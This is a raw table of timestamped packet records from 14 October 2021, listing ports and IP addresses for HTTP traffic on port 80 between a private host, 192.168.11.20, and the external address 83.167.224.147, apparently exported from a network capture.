Oct 14, 2021 08:40:31.922652960 CEST	49808	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:31.922674894 CEST	49808	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:31.922683001 CEST	49808	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:31.942763090 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:31.942856073 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:31.942960978 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:31.943032026 CEST	49808	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:31.943033934 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:31.943079948 CEST	49808	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:31.943084955 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:31.943131924 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:31.943176031 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:31.943208933 CEST	49808	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:31.943222046 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:31.943269014 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:31.943314075 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:31.943357944 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:31.943384886 CEST	49808	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:31.943403959 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:31.943423986 CEST	49808	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:31.943449974 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:31.943495035 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:31.943543911 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:31.943559885 CEST	49808	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:31.943589926 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:31.943598032 CEST	49808	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:31.943638086 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:31.943681955 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:31.943727016 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:31.943732023 CEST	49808	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:31.943770885 CEST	49808	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:31.943773985 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:31.943866014 CEST	49808	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:31.943876982 CEST	49808	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:31.944040060 CEST	49808	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:31.944050074 CEST	49808	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:31.964116096 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:31.964204073 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:31.964323044 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:31.964378119 CEST	49808	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:31.964418888 CEST	49808	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:31.964442015 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:31.964549065 CEST	49808	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:31.964567900 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:31.964659929 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:31.964724064 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:31.964724064 CEST	49808	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:31.964771986 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:31.964818001 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:31.964863062 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:31.964905024 CEST	49808	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:31.964907885 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:31.964943886 CEST	49808	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:31.964957952 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:31.965004921 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:31.965049028 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:31.965080976 CEST	49808	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:31.965095043 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:31.965120077 CEST	49808	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:31.965142012 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:31.965188026 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:31.965234041 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:31.965257883 CEST	49808	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:31.965279102 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:31.965296030 CEST	49808	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:31.965326071 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:31.965372086 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:31.965416908 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:31.965436935 CEST	49808	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:31.965462923 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:31.965476036 CEST	49808	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:31.965509892 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:31.965555906 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:31.965562105 CEST	49808	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:31.965573072 CEST	49808	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:31.965601921 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:31.965647936 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:31.965692997 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:31.965738058 CEST	49808	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:31.965739965 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:31.965748072 CEST	49808	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:31.965787888 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:31.965835094 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:31.965914011 CEST	49808	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:31.965917110 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:31.965924978 CEST	49808	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:31.965965033 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:31.966011047 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:31.966056108 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:31.966092110 CEST	49808	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:31.966101885 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:31.966103077 CEST	49808	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:31.966149092 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:31.966193914 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:31.966238976 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:31.966284037 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:31.966320038 CEST	49808	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:31.966357946 CEST	49808	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:31.966495037 CEST	49808	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:31.966532946 CEST	49808	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:31.966648102 CEST	49808	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:31.966670990 CEST	49808	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:31.986845016 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:31.986998081 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:31.987046003 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:31.987059116 CEST	49808	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:31.987092972 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:31.987140894 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:31.987191916 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:31.987287998 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:31.987349033 CEST	49808	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:31.987363100 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:31.987390041 CEST	49808	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:31.987412930 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:31.987458944 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:31.987504005 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:31.987524033 CEST	49808	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:31.987550020 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:31.987562895 CEST	49808	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:31.987693071 CEST	49808	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:31.987782001 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:31.987828016 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:31.987874031 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:31.987876892 CEST	49808	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:31.987916946 CEST	49808	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:31.987920046 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:31.987966061 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:31.988003016 CEST	49808	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:31.988013983 CEST	49808	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:31.988037109 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:31.988084078 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:31.988130093 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:31.988174915 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:31.988181114 CEST	49808	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:31.988220930 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:31.988267899 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:31.988315105 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:31.988358021 CEST	49808	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:31.988359928 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:31.988368988 CEST	49808	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:31.988378048 CEST	49808	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:31.988406897 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:31.988451958 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:31.988497972 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:31.988534927 CEST	49808	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:31.988543034 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:31.988590956 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:31.988635063 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:31.988679886 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:31.988724947 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:31.988763094 CEST	49808	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:31.988770962 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:31.988801956 CEST	49808	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:31.988812923 CEST	49808	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:31.988818884 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:31.988864899 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:31.988909960 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:31.988940001 CEST	49808	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:31.988954067 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:31.988977909 CEST	49808	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:31.989001036 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:31.989047050 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:31.989092112 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:31.989119053 CEST	49808	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:31.989137888 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:31.989186049 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:31.989231110 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:31.989275932 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:31.989288092 CEST	49808	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:31.989320040 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:31.989327908 CEST	49808	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:31.989339113 CEST	49808	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:31.989367008 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:31.989413023 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:31.989458084 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:31.989464998 CEST	49808	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:31.989502907 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:31.989548922 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:31.989593029 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:31.989639044 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:31.989641905 CEST	49808	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:31.989680052 CEST	49808	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:31.989684105 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:31.989690065 CEST	49808	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:31.989698887 CEST	49808	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:31.989706993 CEST	49808	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:31.989731073 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:31.989778042 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:31.989819050 CEST	49808	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:31.989823103 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:31.989913940 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:31.989952087 CEST	49808	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:31.989962101 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:31.990009069 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:31.990053892 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:31.990098953 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:31.990128994 CEST	49808	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:31.990143061 CEST	49808	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:31.990144014 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:31.990150928 CEST	49808	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:31.990191936 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:31.990237951 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:31.990283012 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:31.990304947 CEST	49808	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:31.990329027 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:31.990375042 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:31.990420103 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:31.990464926 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:31.990483046 CEST	49808	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:31.990493059 CEST	49808	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:31.990510941 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:31.990556955 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:31.990601063 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:31.990647078 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:31.990694046 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:31.990923882 CEST	49808	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:31.990951061 CEST	49808	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:31.990959883 CEST	49808	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:31.990967989 CEST	49808	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:31.990976095 CEST	49808	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:31.991024017 CEST	49808	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:32.011077881 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:32.011138916 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:32.011185884 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:32.011230946 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:32.011277914 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:32.011323929 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:32.011372089 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:32.011400938 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:32.011432886 CEST	49808	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:32.011442900 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:32.011460066 CEST	49808	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:32.011490107 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:32.011538982 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:32.011585951 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:32.011610031 CEST	49808	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:32.011625051 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:32.011652946 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:32.011702061 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:32.011749029 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:32.011785984 CEST	49808	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:32.011796951 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:32.011806965 CEST	49808	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:32.011812925 CEST	49808	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:32.011817932 CEST	49808	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:32.011822939 CEST	49808	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:32.011847019 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:32.011893034 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:32.011920929 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:32.011964083 CEST	49808	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:32.011967897 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:32.012010098 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:32.012068033 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:32.012115002 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:32.012125969 CEST	49808	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:32.012146950 CEST	49808	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:32.012160063 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:32.012207031 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:32.012254953 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:32.012269974 CEST	49808	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:32.012275934 CEST	49808	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:32.012284040 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:32.012327909 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:32.012373924 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:32.012422085 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:32.012447119 CEST	49808	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:32.012468100 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:32.012528896 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:32.012578011 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:32.012623072 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:32.012625933 CEST	49808	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:32.012636900 CEST	49808	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:32.012665033 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:32.012691975 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:32.012717962 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:32.012742996 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:32.012768030 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:32.012794018 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:32.012801886 CEST	49808	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:32.012806892 CEST	49808	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:32.012820005 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:32.012845993 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:32.012871981 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:32.012897015 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:32.012922049 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:32.012948036 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:32.012973070 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:32.013016939 CEST	49808	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:32.013025999 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:32.013029099 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:32.013055086 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:32.013079882 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:32.013104916 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:32.013130903 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:32.013155937 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:32.013181925 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:32.013194084 CEST	49808	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:32.013207912 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:32.013235092 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:32.013259888 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:32.013284922 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:32.013309956 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:32.013335943 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:32.013360977 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:32.013380051 CEST	49808	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:32.013386011 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:32.013401031 CEST	49808	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:32.013412952 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:32.013438940 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:32.013463974 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:32.013489962 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:32.013515949 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:32.013540983 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:32.013560057 CEST	49808	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:32.013566017 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:32.013580084 CEST	49808	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:32.013592005 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:32.013617039 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:32.013642073 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:32.013667107 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:32.013693094 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:32.013717890 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:32.013735056 CEST	49808	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:32.013742924 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:32.013768911 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:32.013793945 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:32.013818979 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:32.013855934 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:32.013885021 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:32.013911009 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:32.013912916 CEST	49808	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:32.013936996 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:32.013962984 CEST	80	49808	83.167.224.147	192.168.11.20
